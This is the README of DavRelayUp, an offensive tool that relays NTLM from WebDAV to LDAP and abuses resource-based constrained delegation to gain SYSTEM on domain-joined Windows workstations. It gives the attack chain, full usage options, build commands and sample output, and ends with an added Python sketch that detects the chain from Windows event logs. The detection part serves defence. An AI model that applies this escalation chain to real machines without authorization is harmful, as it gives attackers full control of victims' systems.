
DavRelayUp - a universal no-fix local privilege escalation in domain-joined Windows workstations where LDAP signing is not enforced (the default settings).


DavRelayUp

A quick and dirty port of KrbRelayUp, modified to allow NTLM relay from WebDAV to LDAP in order to streamline the abuse of the following attack primitive:

  1. (Optional) New machine account creation (New-MachineAccount)
  2. Force start the WebClient service
  3. Start the WebDAV relay server (GoRelayServer - a Go DLL that is embedded in DavRelayUp using Costura.Fody)
  4. Local machine account auth coercion (SharpSystemTriggers)
  5. NTLM relay to LDAP
  6. Add RBCD privs and obtain privileged ST to local machine (Rubeus)
  7. Use said ST to authenticate to the local Service Manager and create a new service as NT AUTHORITY\SYSTEM (SCMUACBypass)

This is essentially a universal no-fix local privilege escalation in domain-joined Windows workstations where LDAP signing is not enforced (the default settings).

Usage

DavRelayUp - Relaying you to SYSTEM, again...

Usage: DavRelayUp.exe [-c] [-cn COMPUTERNAME] [-cp PASSWORD | -ch NTHASH]

RBCD Options:
    -c   (--CreateNewComputerAccount) Create new computer account for RBCD. Will use the current authenticated user.
    -cn  (--ComputerName)             Name of attacker owned computer account for RBCD. (default=DAVRELAYUP$)
    -cp  (--ComputerPassword)         Password of computer account for RBCD. (default=RANDOM [if -c is enabled])
    -ch  (--ComputerPasswordHash)     Password NT hash of computer account for RBCD. (either -cp or -ch must be specified)
    -i   (--Impersonate)              User to impersonate. Should be a local administrator in the target computer. (default=Administrator)

KrbSCM Options:
    -s   (--ServiceName)              Name of the service to be created. (default=KrbSCM)
    -sc  (--ServiceCommand)           Service command [binPath]. (default = spawn cmd.exe as SYSTEM)

General Options:
    -p  (--Port)                     Port for WebDAV Server (default=55555)
    -d  (--Domain)                   FQDN of domain. (Optional)
    -dc (--DomainController)         FQDN of domain controller. (Optional)
    -ssl                             Use LDAP over SSL. (Optional)
    -n                               Use CreateNetOnly (needs to be on disk) instead of PTT when importing ST (Optional)
    -v  (--Verbose)                  Show verbose output. (Optional)
    -h  (--Help)                     Show help

Known Issues

If DavRelayUp gets stuck at one of the stages shown below, try a different port by specifying the [-p] flag:

DavRelayUp - Relaying you to SYSTEM, again...

[+] WebClient Service started successfully
[+] Starting Relay Server on Port 55555
[+] Coercing System Authentication

DavRelayUp - Relaying you to SYSTEM, again...

[+] WebClient Service started successfully
[+] Starting Relay Server on Port 55555
[+] Coercing System Authentication
[+] WebDAV Request: No Authorization header
[+] WebDAV Response: Sending 401 Unauthorized with "WWW-Authenticate: NTLM" header

Examples

DavRelayUp.Demo.mp4


Building

  1. Build GoRelayServer (it is already built and included in this repository, but in case you want to do it yourself):
    PS C:\Tools\DavRelayUp> cd GoRelayServer
    PS C:\Tools\DavRelayUp\GoRelayServer> go build --buildmode=c-shared -ldflags="-s -w"  -o "../DavRelayUp/Costura64/GoRelayServer.dll" main.go
    
    This builds the GoRelayServer DLL and saves it to "DavRelayUp\DavRelayUp\Costura64\GoRelayServer.dll", the folder from which Costura.Fody embeds it into the final DavRelayUp.exe executable.
  2. Open KrbRelayUp.sln in Visual Studio 2019
  3. Make sure that Solution Configuration is set to Release and hit build (CTRL+SHIFT+B)

TODO

  • Add ShadowCred attack as a RELAY method
  • Add U2U support to allow for the attack without the need for a machine account

Mitigation & Detection
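
A detection sketch for the chain listed in the introduction, added here as an example; it is not code from DavRelayUp or its author. It flags a computer account writing msDS-AllowedToActOnBehalfOfOtherIdentity on its own object (event 5136, the result of steps 5 and 6) and correlates it with a preceding computer account creation (4741, step 1) and a following service installation on that host (7045, step 7). The event field names, the 10-minute window and the sample records are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
WINDOW = timedelta(minutes=10)  # assumed correlation window

# Constructed sample events with simplified field names (not a real log export).
EVENTS = [
    {"time": "2024-01-10T09:00:01", "id": 4741, "subject": "jdoe", "target": "DAVRELAYUP$"},
    {"time": "2024-01-10T09:00:05", "id": 5136, "subject": "WS01$", "object": "CN=WS01,CN=Computers,DC=corp,DC=example", "attribute": RBCD_ATTR},
    {"time": "2024-01-10T09:00:09", "id": 7045, "host": "ws01.corp.example", "service": "KrbSCM"},
    {"time": "2024-01-10T11:30:00", "id": 5136, "subject": "admin1", "object": "CN=SRV02,CN=Computers,DC=corp,DC=example", "attribute": RBCD_ATTR},
    {"time": "2024-01-10T11:31:00", "id": 7045, "host": "srv02.corp.example", "service": "BackupAgent"},
]

def ts(e):
    return datetime.fromisoformat(e["time"])

def object_cn(dn):
    """Return the leading CN value of a distinguished name, upper-cased."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1].upper() if "=" in first else ""

def find_rbcd_self_writes(events):
    """5136 events where a computer account sets the RBCD attribute on itself."""
    hits = []
    for e in events:
        if e["id"] != 5136 or e.get("attribute") != RBCD_ATTR:
            continue
        subject = e["subject"].upper()
        if subject.endswith("$") and subject[:-1] == object_cn(e["object"]):
            hits.append(e)
    return hits

def correlate(events):
    """Attach 4741 events before and 7045 events after each self-write, within WINDOW."""
    alerts = []
    for w in find_rbcd_self_writes(events):
        host = object_cn(w["object"])
        new_accounts = [e["target"] for e in events if e["id"] == 4741
                        and timedelta(0) <= ts(w) - ts(e) <= WINDOW]
        services = [e["service"] for e in events if e["id"] == 7045
                    and e["host"].split(".")[0].upper() == host
                    and timedelta(0) <= ts(e) - ts(w) <= WINDOW]
        alerts.append({"host": host, "new_accounts": new_accounts, "services": services,
                       "severity": "high" if services else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

Event 5136 is only logged when directory service change auditing and a matching SACL are configured; the 4741 list can be empty because step 1 is optional.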

Acknowledgements